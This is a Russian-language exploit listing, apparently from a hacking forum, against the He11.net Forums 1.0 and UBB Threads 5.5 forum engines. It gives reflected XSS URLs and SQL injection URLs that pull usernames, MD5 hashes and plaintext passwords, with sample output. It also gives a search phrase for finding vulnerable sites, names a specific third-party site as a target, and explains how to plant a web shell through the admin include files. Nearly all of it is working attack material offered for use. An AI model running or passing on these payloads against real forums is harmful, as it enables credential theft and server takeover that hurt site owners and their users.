Форум: He11.net Forums
Версия: 1.0
1. Пасивная XSS.
Код:
http://site.ru/forum/index.php?top_message=<script>alert();</script>
2. SQL инъекция.
1)
Код:
http://site.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9,10,11,12+from+Dragon_users/*
в результате получаем строку вида:
1:grey:
202cb962ac59075b964b07152d234b70:
123
В базе данных хранится и
зашифрованный пароль (md5) и
пароль в чистом виде.
2)
Код:
http://site.ru/forum/view_thread.php?id=-1+union+select+1,2,3,4,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),6,7,8,9+from+Dragon_users/*
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: "View Today's Active Topics"
Пример уязвимого форума:
__http://sims2.h10.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char( 58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9, 10,11,12+from+Dragon_users/*
------------------------------------------------------------
------------------------------------------------------------
Форум: UBB Threads
Версия: 5.5
Пассивная XSS:
Код:
http://site.ru/showprofile.php?Cat=&User=<script>alert();</script>
Активная XSS:
При создание сообщения на форуме в поле
Сообщение вписываем скрипт, скрипт будет выполняться при просмотре темы.
Заливка шелла:
Заходим в админку - Includes, редактируем (вписываем шелл) любой из файлов (Header, Footer и т.д.).
Шелл будет доступен по адресу:
http://site.ru/includes/header.php